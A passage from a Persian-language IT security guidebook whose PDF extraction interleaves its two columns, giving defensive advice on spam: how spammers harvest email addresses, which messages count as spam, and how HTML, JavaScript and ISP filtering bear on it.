‫ﺑﻮﺩﻩ ﺍﺳﺖ! ﺑﺴﻴﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻫﻢ ﺍﻛﻨﻮﻥ ﺑﻪ ﺍﺯﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻫـﺮ ﻳـﻚ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ‪ ،‬ﻭﻟﻲ ﺩﺭ ﻋﻮﺽ ﻛﻨﺘﺮﻝ‬
‫ﻧﺎﻣﺔ ﻣﻌﺘﺒﺮ ﺣﺪﻭﺩ ‪ ۱۰‬ﻫﺮﺯﻧﺎﻣﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﻬﺘﺮﻱ ﺭﻭﻱ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﺔ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺧـﻮﺩ ﺑﺪﺳـﺖ‬
‫ﺍﮔــﺮ ﺩﺭ ﻓﻴﻠــﺪ "ﻣﻮﺿــﻮﻉ" ﻫﺮﺯﻧﺎﻣــﻪﻫــﺎ ﻋﺒﺎﺭﺗﻬــﺎﻳﻲ ﻧﻈﻴــﺮ‬ ‫ﺁﻭﺭﻳﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘـﺴﺖ‬
‫"**‪ "**SPAM‬ﻭﺟﻮﺩ ﻣﻲﺩﺍﺷﺖ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻲ ﺗﻮﺍﻧﺴﺘﻴﻢ ﺑﻪ ﺁﺳـﺎﻧﻲ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛـﺪ ‪ HTML‬ﺣﺘـﻲ ﻻﺯﻡ ﻧﻴـﺴﺖ‬
‫ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﻢ‪ .‬ﻗﻮﺍﻧﻴﻦ ﻣﺼﻮﺏ ﻗﻀﺎﻳﻲ ﺣﻜﻢ ﻣﻲﻛﻨﺪ‬ ‫ﭘﻴﺎﻣﻲ ﻛﻪ ﺣﺎﻭﻱ ﻛﺪ ‪ HTML‬ﺍﺳﺖ ﺭﺍ ﺑﺎﺯ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬
‫ﻛﻪ ﻫﺮ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻛـﻪ ﺍﺯ ﺳـﻮﻱ ﺷـﺮﻛﺘﻬﺎﻱ‬ ‫ﺩﺭ ﺁﻣﺪﻥ ﺁﻥ ﭘﻴﺎﻡ ﺩﺭ ﺻﻔﺤﺔ ﭘﻴﺶﻧﻤﺎﻳﺶ‪ ٦٨‬ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛﺪ‬
‫ﺗﺠﺎﺭﻱ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ‬ ‫ﻛﺎﻓﻲ ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺎﻭﻱ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭﺳـﻴﻊ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﻭ ﻧﻴـﺰ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﻣﺤـﺪﻭﺩ‬ ‫ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ HTML‬ﺑﺎﺷـﺪ ﺍﻣـﺎ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﻭ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ‬ ‫ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﻪ ﺷــﻤﺎ ﺍﺟــﺎﺯﻩ ﻣــﻲﺩﻫﻨــﺪ‬
‫ﻋﻤﻠﻲ ﻧﻴﺴﺖ‪ .‬ﻫﺮﻛﺲ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻭ ﻳـﺎ ﺍﺭﺳـﺎﻝ‬ ‫‪ ،Javascript ،cookie‬ﻭ ‪ plug-in‬ﺻــﻔﺤﺎﺗﻲ ﻛــﻪ ﺑﻌﻨــﻮﺍﻥ‬
‫ﺍﺧﻄﺎﺭ ﺑﻪ ﻳﻚ ﺳﻴـﺴﺘ ﹺﻢ ﺷـﻠﻮ ﹺﻍ ﺩﺭﻳﺎﻓـﺖ ﺷـﻜﺎﻳﺖ‪ ،‬ﻳـﻚ ﺭﻭﺵ‬ ‫ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ‬
‫ﻣﻨﻄﻘﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻭ ﺣﺬﻑ ﺁﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪67‬‬ ‫‪Fancy HTML‬‬


‫‪69‬‬ ‫‪Spam‬‬ ‫‪68‬‬ ‫‪Preview Screen‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨٢‬‬

‫ﻳﻚ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‪ ٧٣‬ﺑﺮﺍﻱ ﺧﻮﺩ ﺛﺒﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ‬ ‫•‬ ‫ﺁﺷﻨﺎﻳﻲ ﺑﻴﺸﺘﺮ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﮔﺮﻭﻩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻳﻚ ﭘﺎﻳﮕﺎﻩ‬
‫ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺩﺭ ﭘـﻲ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ ﺳـﻪ‬
‫ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻧﻜﺘﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ‪:‬‬
‫ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﭘـﺴﺘﻲ ﻗﺎﺑـﻞ ﺣـﺪﺱ ﺯﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫•‬
‫ﺍﻟﻒ( ﭼﮕﻮﻧﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺏ( ﭼﻪ ﭼﻴﺰﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ )ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺩﻗﻴﻖ(‪.‬‬
‫ﻼ‬
‫ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻜﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒ ﹰ‬ ‫•‬ ‫ﺝ( ﭼﺮﺍ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﻪ ﺁﻧﻬﺎ ﻧﻔﻮﺫ ﺷﺪﻩ ﺍﺳﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ ﺻـﺪﻕ ﻛﻨـﺪ ﺍﺣﺘﻤـﺎﻝ‬ ‫ﺍﻟــﻒ( ﺍﮔــﺮ ﻳﻜــﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﺯﻳــﺮ ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ‬
‫ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺁﺩﺭﺱ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﻣﻮﻗﻌﻴﺖ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ‬
‫ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﻭﺧﺘﻪ ﺷـﻮﺩ‪ .‬ﺑـﻪ‬ ‫ﺩﺍﺭﻧﺪ‪:‬‬
‫ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺍﻳـﻦ‬ ‫ﻧﺎﻣﻪ ﻳﺎ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻳـﻚ ﻓﻬﺮﺳـﺖ ﺁﺩﺭﺱ‬ ‫•‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ‬ ‫ﻋﻤﻮﻣﻲ‪ ٧٠‬ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﻼ ﺧﻮﺍﺳـﺘﻪ‬
‫ﺑﻪ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻣـﺜ ﹰ‬ ‫•‬
‫ﺏ( ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﻪ ﺩﻟﻴﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﻭ ﻧﺎﻣﺮﺑﻮﻁ‬ ‫ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﺯ ﻓﻬﺮﺳـﺖ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﮔﺎﻥ ﺣـﺬﻑ‬
‫ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﻪ ﻣﻲﺩﺍﻧﻨﺪ ﻛـﻪ‬ ‫ﺑﻮﺩﻧﺸﺎﻥ ﻛﺎﻣ ﹰ‬ ‫ﺷﻮﻳﺪ‪.‬‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺑﻌﻀﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺩﻳﮕـﺮ ﺍﻳـﻦ‬ ‫ﺑﺮﺍﻱ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ‪ ٧١‬ﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬ ‫•‬
‫ﻣﺴﺌﻠﻪ ﻛﻤﺘﺮ ﺁﺷﻜﺎﺭ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ‬
‫ﺑﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳـﺎﻓﺘﻲ‬ ‫ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﻳـﻚ ﻓـﺮﻡ ﻭﺏ ﺛﺒـﺖ ﻧـﺎﻡ ﻛـﺮﺩﻩ‬ ‫•‬

‫ﺭﺍ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺪﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﻣﺜﺎﻟﻬﺎﻱ ﺯﻳﺮ ﺑـﻪ ﺭﻭﺷـﻦ ﺷـﺪﻥ‬ ‫ﺑﺎﺷﻴﺪ ﻭ ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﻭﺍﺭﺩ ﻧﻤـﻮﺩﻩ ﺑﺎﺷـﻴﺪ‬
‫ﺑﻴﺸﺘﺮ ﻣﻮﺿﻮﻉ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪:‬‬ ‫)ﺣﺘﻲ ﺍﮔﺮ ﻛﺎﻣ ﹰ‬
‫ﻼ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻣﻌﺘﺒـﺮﻱ‬
‫ﻣﺮﺍﺟﻌﻪ ﻧﻤﻮﺩﻩﺍﻳﺪ(‪.‬‬
‫ﺁﻳﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ‬ ‫•‬
‫ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕﻲ ﻣﺮﺍﻗﺒﺖ ﺍﺯ ﺍﺟـﺰﺍﻱ ﺻـﻮﺭﺕ ﺍﺳـﺖ‬ ‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ‪ ٧٢‬ﺭﻭﻱ ﺁﻥ‬ ‫•‬

‫ﻳــﻚ ﻫﺮﺯﻧﺎﻣــﻪ ﺑــﻪ ﺷــﻤﺎﺭ ﻣــﻲﺭﻭﺩ؟ ﭘﺎﺳــﺦ‪ :‬ﺑﻠــﻪ‪،‬‬ ‫ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ )ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ UNIX‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺟـﺮﺍﺡ ﭘﻼﺳـﺘﻴﻚ‬
‫ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻫﺮ ﻛﺲ ﻛﻪ ﺁﻧﺮﺍ ﺳﺆﺍﻝ ﻛﻨﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ(‪.‬‬
‫ﺑﺎﺷــﻴﺪ ﻭ ﺍﻳــﻦ ﻧﺎﻣــﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳــﻚ ﻣﻘﺎﻟــﺔ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎﺷﺪ ﻭ ﻧﻪ ﻳﻚ ﺁﮔﻬﻲ ﺗﺠﺎﺭﻱ‪.‬‬ ‫ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ‬ ‫•‬
‫ﻛﻨﺪ‪.‬‬
‫ﺁﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻘﺎﻟﻪ ﺍﺯ ﺷﻤﺎ ﺑﺮﺍﻱ ﻳﻚ ﮔﺮﺩﻫﻤـﺎﻳﻲ‬ ‫•‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎ ﻣﻮﺿـﻮﻋﻲ ﻣـﺒﻬﻢ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪﻳﻦ‬ ‫ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩ‬ ‫•‬
‫ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺸﻤﺎﺭ‬ ‫ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻣﻲﺭﻭﺩ؟ ﭘﺎﺳﺦ‪ :‬ﺷﺎﻳﺪ‪ .‬ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺑﻄـﻮﺭ ﺍﺗﻔـﺎﻗﻲ‬ ‫ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻳـﻚ ﺻـﻔﺤﺔ ﻭﺏ ﻗـﺮﺍﺭ‬ ‫•‬
‫ﻣﻮﺿﻮﻉ ﺁﻥ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺑﺎﺷﺪ ﻭ ﻣﺎﻳﻞ ﺑﺎﺷـﻴﺪ‬ ‫ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻳﻌﻨـﻲ ﺍﺟـﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﺩﺭﺱ‬
‫ﺑﻪ ﺁﻥ ﭘﺎﺳﺦ ﺩﻫﻴﺪ‪.‬‬ ‫ﭘﺴﺘﻲ ﺷﻤﺎ ﺑﺮﺍﻱ ﻫﻤﻪ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺷــﺮﻛﺘﻲ ﻛــﻪ ﺑــﻪ ﺷــﻤﺎ ﻣﺤــﺼﻮﻟﻲ ﻓﺮﻭﺧﺘــﻪ ﻭ‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻝ ﺑﻌﺪﻱ ﺧﻮﺩ ﺑـﺮﺍﻱ‬
‫‪70‬‬ ‫‪Public Mailing List‬‬
‫‪71‬‬ ‫‪Newsgroup‬‬
‫‪73‬‬ ‫‪Domain Name‬‬ ‫‪72‬‬ ‫‪Ident Daemon‬‬
‫‪٨٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻣـﺸﻜﻞ ﻭ ﭘﺮﻫﺰﻳﻨـﻪ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﻫـﻴﭻ ﺭﺍﻫﻜـﺎﺭ‬ ‫ﺷــﻤﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣــﺸﺘﺮﻳﻬﺎﻱ ﺩﻳﮕــﺮ ﺍﺭﺳــﺎﻝ‬
‫ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺁﻥ ﺍﻧﺪﻳﺸﻴﺪﻩ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﻣﻲ ﻛﻨﺪ‪ ،‬ﺁﻳﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ؟ ﭘﺎﺳـﺦ‪ :‬ﺧﻴـﺮ‪.‬‬
‫ﺍﻣــﺎ ﺑﺮﻧﺎﻣــﺔ ﻏﺮﺑــﺎﻝﺳــﺎﺯ ﻫﺮﺯﻧﺎﻣــﻪ ﺩﺭ ‪ ISP‬ﺷــﻤﺎ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻤـﺪﺓ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺎﻧﻨـﺪ ﺷـﺮﻛﺘﻬﺎ( ﺍﺯ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺻﺮﻑ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ‬
‫ﭘﺬﻳﺮﻓﺘﻦ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺳﻮﻱ ‪ISP‬ﻫـﺎﻳﻲ ﻣﻨﺘـﺸﺮ‬
‫ﻛﻨﺪ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﭼﻨـﻴﻦ ﻧﺎﻣـﻪﺍﻱ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺟﺎﺯﺓ ﻓﻌﺎﻟﻴﺖ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻧـﻮﻳﺲﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ‬
‫ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﺷﻮﺩ‪ ،‬ﺯﻳﺮﺍ ‪ISP‬ﻫﺎ ﺭﺍ‬
‫ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ‪.‬‬ ‫ﺍﮔﺮ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻣﻄﻠﺒﻲ ﺑﺎﺷﺪ ﻛﻪ‬ ‫•‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻻ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻲﮔﻨﺎﻫﻲ ﻛﻪ ﺗﻌﺪﺍﺩ‬ ‫ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻌﻤﻮ ﹰ‬ ‫ﺑﺎ ﺗﻤﺎﻡ ﺗﻌﺎﺭﻳﻒ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﺷﻮﺩ‪ ،‬ﺁﻳﺎ ﺣﺘﻤـﹰﺎ‬
‫ﻛﻤﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺻﺪ ﻣﺨﺘﻠﻒ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨـﺪ ﻫـﻢ‬ ‫ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؟ ﭘﺎﺳﺦ‪ :‬ﺑﻠﻪ؛ ﺍﻣﺎ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ‬
‫ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ‬ ‫ﻼ ﺍﮔـﺮ ﺍﻳـﻦ‬‫ﺍﺻﻞ ﺁﻥ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻣﺎ ﻣـﺜ ﹰ‬
‫ﺗﺸﺨﻴﺺ ﻫﺮﺯﻧﺎﻣﻪ‪ ،‬ﺣﺬﻑ ﺁﻥ ﻭ ﻳـﺎ ﻫـﺸﺪﺍﺭ ﺑـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ‬ ‫ﻧﺎﻣـــﻪ ﺍﺯ ﺳـــﻮﻱ ﻳﻜـــﻲ ﺍﺯ ﺧﻮﺍﻧﻨـــﺪﮔﺎﻥ ﺑـــﺮﺍﻱ‬
‫ﻣﺒﻨﻲ ﺑﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﺍ‬ ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭ ﺁﻥ ﻣﺜﺎﻟﻬـﺎﻱ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ ISP‬ﻳﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﺴﺘﻲ‪ ٧٤‬ﺑﻪ ﺍﺟﺮﺍ‬ ‫ﺟﺎﻟﺒﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺫﻛـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ‬
